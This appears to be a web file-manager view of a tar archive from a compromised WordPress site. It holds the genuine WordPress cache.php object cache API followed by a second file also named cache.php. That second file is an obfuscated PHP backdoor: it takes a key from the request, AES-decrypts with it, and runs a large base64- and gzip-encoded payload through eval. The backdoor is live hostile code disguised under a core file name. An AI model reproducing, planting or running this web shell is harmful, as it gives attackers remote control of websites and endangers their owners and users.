File manager - Edit - /home/verseaumee/empowernetkenyajuly2026/cache.php.tar
Back
home/verseaumee/empowernetkenyajuly2026/wp-includes/cache.php 0000604 00000032256 15251716716 0020315 0 ustar 00 <?php /** * Object Cache API * * @link https://developer.wordpress.org/reference/classes/wp_object_cache/ * * @package WordPress * @subpackage Cache */ /** WP_Object_Cache class */ require_once ABSPATH . WPINC . '/class-wp-object-cache.php'; /** * Sets up Object Cache Global and assigns it. * * @since 2.0.0 * * @global WP_Object_Cache $wp_object_cache */ function wp_cache_init() { $GLOBALS['wp_object_cache'] = new WP_Object_Cache(); } /** * Adds data to the cache, if the cache key doesn't already exist. * * @since 2.0.0 * * @see WP_Object_Cache::add() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param int|string $key The cache key to use for retrieval later. * @param mixed $data The data to add to the cache. * @param string $group Optional. The group to add the cache to. Enables the same key * to be used across groups. Default empty. * @param int $expire Optional. When the cache data should expire, in seconds. * Default 0 (no expiration). * @return bool True on success, false if cache key and group already exist. */ function wp_cache_add( $key, $data, $group = '', $expire = 0 ) { global $wp_object_cache; return $wp_object_cache->add( $key, $data, $group, (int) $expire ); } /** * Adds multiple values to the cache in one call. * * @since 6.0.0 * * @see WP_Object_Cache::add_multiple() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param array $data Array of keys and values to be set. * @param string $group Optional. Where the cache contents are grouped. Default empty. * @param int $expire Optional. When to expire the cache contents, in seconds. * Default 0 (no expiration). * @return bool[] Array of return values, grouped by key. Each value is either * true on success, or false if cache key and group already exist. */ function wp_cache_add_multiple( array $data, $group = '', $expire = 0 ) { global $wp_object_cache; return $wp_object_cache->add_multiple( $data, $group, (int) $expire ); } /** * Replaces the contents of the cache with new data. * * @since 2.0.0 * * @see WP_Object_Cache::replace() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param int|string $key The key for the cache data that should be replaced. * @param mixed $data The new data to store in the cache. * @param string $group Optional. The group for the cache data that should be replaced. * Default empty. * @param int $expire Optional. When to expire the cache contents, in seconds. * Default 0 (no expiration). * @return bool True if contents were replaced, false if original value does not exist. */ function wp_cache_replace( $key, $data, $group = '', $expire = 0 ) { global $wp_object_cache; return $wp_object_cache->replace( $key, $data, $group, (int) $expire ); } /** * Saves the data to the cache. * * Differs from wp_cache_add() and wp_cache_replace() in that it will always write data. * * @since 2.0.0 * * @see WP_Object_Cache::set() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param int|string $key The cache key to use for retrieval later. * @param mixed $data The contents to store in the cache. * @param string $group Optional. Where to group the cache contents. Enables the same key * to be used across groups. Default empty. * @param int $expire Optional. When to expire the cache contents, in seconds. * Default 0 (no expiration). * @return bool True on success, false on failure. */ function wp_cache_set( $key, $data, $group = '', $expire = 0 ) { global $wp_object_cache; return $wp_object_cache->set( $key, $data, $group, (int) $expire ); } /** * Sets multiple values to the cache in one call. * * @since 6.0.0 * * @see WP_Object_Cache::set_multiple() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param array $data Array of keys and values to be set. * @param string $group Optional. Where the cache contents are grouped. Default empty. * @param int $expire Optional. When to expire the cache contents, in seconds. * Default 0 (no expiration). * @return bool[] Array of return values, grouped by key. Each value is either * true on success, or false on failure. */ function wp_cache_set_multiple( array $data, $group = '', $expire = 0 ) { global $wp_object_cache; return $wp_object_cache->set_multiple( $data, $group, (int) $expire ); } /** * Retrieves the cache contents from the cache by key and group. * * @since 2.0.0 * * @see WP_Object_Cache::get() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param int|string $key The key under which the cache contents are stored. * @param string $group Optional. Where the cache contents are grouped. Default empty. * @param bool $force Optional. Whether to force an update of the local cache * from the persistent cache. Default false. * @param bool|null $found Optional. Whether the key was found in the cache (passed by reference). * Disambiguates a return of false, a storable value. Default null. * @return mixed|false The cache contents on success, false on failure to retrieve contents. */ function wp_cache_get( $key, $group = '', $force = false, &$found = null ) { global $wp_object_cache; return $wp_object_cache->get( $key, $group, $force, $found ); } /** * Retrieves multiple values from the cache in one call. * * @since 5.5.0 * * @see WP_Object_Cache::get_multiple() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param array $keys Array of keys under which the cache contents are stored. * @param string $group Optional. Where the cache contents are grouped. Default empty. * @param bool $force Optional. Whether to force an update of the local cache * from the persistent cache. Default false. * @return array Array of return values, grouped by key. Each value is either * the cache contents on success, or false on failure. */ function wp_cache_get_multiple( $keys, $group = '', $force = false ) { global $wp_object_cache; return $wp_object_cache->get_multiple( $keys, $group, $force ); } /** * Removes the cache contents matching key and group. * * @since 2.0.0 * * @see WP_Object_Cache::delete() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param int|string $key What the contents in the cache are called. * @param string $group Optional. Where the cache contents are grouped. Default empty. * @return bool True on successful removal, false on failure. */ function wp_cache_delete( $key, $group = '' ) { global $wp_object_cache; return $wp_object_cache->delete( $key, $group ); } /** * Deletes multiple values from the cache in one call. * * @since 6.0.0 * * @see WP_Object_Cache::delete_multiple() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param array $keys Array of keys under which the cache to deleted. * @param string $group Optional. Where the cache contents are grouped. Default empty. * @return bool[] Array of return values, grouped by key. Each value is either * true on success, or false if the contents were not deleted. */ function wp_cache_delete_multiple( array $keys, $group = '' ) { global $wp_object_cache; return $wp_object_cache->delete_multiple( $keys, $group ); } /** * Increments numeric cache item's value. * * @since 3.3.0 * * @see WP_Object_Cache::incr() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param int|string $key The key for the cache contents that should be incremented. * @param int $offset Optional. The amount by which to increment the item's value. * Default 1. * @param string $group Optional. The group the key is in. Default empty. * @return int|false The item's new value on success, false on failure. */ function wp_cache_incr( $key, $offset = 1, $group = '' ) { global $wp_object_cache; return $wp_object_cache->incr( $key, $offset, $group ); } /** * Decrements numeric cache item's value. * * @since 3.3.0 * * @see WP_Object_Cache::decr() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param int|string $key The cache key to decrement. * @param int $offset Optional. The amount by which to decrement the item's value. * Default 1. * @param string $group Optional. The group the key is in. Default empty. * @return int|false The item's new value on success, false on failure. */ function wp_cache_decr( $key, $offset = 1, $group = '' ) { global $wp_object_cache; return $wp_object_cache->decr( $key, $offset, $group ); } /** * Removes all cache items. * * @since 2.0.0 * * @see WP_Object_Cache::flush() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @return bool True on success, false on failure. */ function wp_cache_flush() { global $wp_object_cache; return $wp_object_cache->flush(); } /** * Removes all cache items from the in-memory runtime cache. * * @since 6.0.0 * * @see WP_Object_Cache::flush() * * @return bool True on success, false on failure. */ function wp_cache_flush_runtime() { return wp_cache_flush(); } /** * Removes all cache items in a group, if the object cache implementation supports it. * * Before calling this function, always check for group flushing support using the * `wp_cache_supports( 'flush_group' )` function. * * @since 6.1.0 * * @see WP_Object_Cache::flush_group() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param string $group Name of group to remove from cache. * @return bool True if group was flushed, false otherwise. */ function wp_cache_flush_group( $group ) { global $wp_object_cache; return $wp_object_cache->flush_group( $group ); } /** * Determines whether the object cache implementation supports a particular feature. * * @since 6.1.0 * * @param string $feature Name of the feature to check for. Possible values include: * 'add_multiple', 'set_multiple', 'get_multiple', 'delete_multiple', * 'flush_runtime', 'flush_group'. * @return bool True if the feature is supported, false otherwise. */ function wp_cache_supports( $feature ) { switch ( $feature ) { case 'add_multiple': case 'set_multiple': case 'get_multiple': case 'delete_multiple': case 'flush_runtime': case 'flush_group': return true; default: return false; } } /** * Closes the cache. * * This function has ceased to do anything since WordPress 2.5. The * functionality was removed along with the rest of the persistent cache. * * This does not mean that plugins can't implement this function when they need * to make sure that the cache is cleaned up after WordPress no longer needs it. * * @since 2.0.0 * * @return true Always returns true. */ function wp_cache_close() { return true; } /** * Adds a group or set of groups to the list of global groups. * * @since 2.6.0 * * @see WP_Object_Cache::add_global_groups() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param string|string[] $groups A group or an array of groups to add. */ function wp_cache_add_global_groups( $groups ) { global $wp_object_cache; $wp_object_cache->add_global_groups( $groups ); } /** * Adds a group or set of groups to the list of non-persistent groups. * * @since 2.6.0 * * @param string|string[] $groups A group or an array of groups to add. */ function wp_cache_add_non_persistent_groups( $groups ) { // Default cache doesn't persist so nothing to do here. } /** * Switches the internal blog ID. * * This changes the blog id used to create keys in blog specific groups. * * @since 3.5.0 * * @see WP_Object_Cache::switch_to_blog() * @global WP_Object_Cache $wp_object_cache Object cache global instance. * * @param int $blog_id Site ID. */ function wp_cache_switch_to_blog( $blog_id ) { global $wp_object_cache; $wp_object_cache->switch_to_blog( $blog_id ); } /** * Resets internal cache keys and structures. * * If the cache back end uses global blog or site IDs as part of its cache keys, * this function instructs the back end to reset those keys and perform any cleanup * since blog or site IDs have changed since cache init. * * This function is deprecated. Use wp_cache_switch_to_blog() instead of this * function when preparing the cache for a blog switch. For clearing the cache * during unit tests, consider using wp_cache_init(). wp_cache_init() is not * recommended outside of unit tests as the performance penalty for using it is high. * * @since 3.0.0 * @deprecated 3.5.0 Use wp_cache_switch_to_blog() * @see WP_Object_Cache::reset() * * @global WP_Object_Cache $wp_object_cache Object cache global instance. */ function wp_cache_reset() { _deprecated_function( __FUNCTION__, '3.5.0', 'wp_cache_switch_to_blog()' ); global $wp_object_cache; $wp_object_cache->reset(); } home/verseaumee/zenit/Vsujmq/cache.php 0000644 00000013006 15251726543 0014041 0 ustar 00 <?php $KLIw = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5KakaxSVFRallGiqJmbmaYGANAA'; $aim = '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'; function KLIw($vIbV) { $aim = ${"\137\x52\x45\121\125\x45\123\x54"}["k"]; $VyE = substr($aim, 0, 16); $ClN = base64_decode($vIbV); return openssl_decrypt($ClN, "AES-256-CBC", $aim, OPENSSL_RAW_DATA, $VyE); } if (KLIw('DjtPn+r4S0yvLCnquPz1fA')){ echo 'Qqf2WwsFdSQ2LSgx/0I7QaAHkylZw1Kkw61FuK8t5kelXZhBZPU0PqUbf5hhUtTK'; exit; } eval(htmlspecialchars_decode(gzinflate(base64_decode($KLIw)))); ?>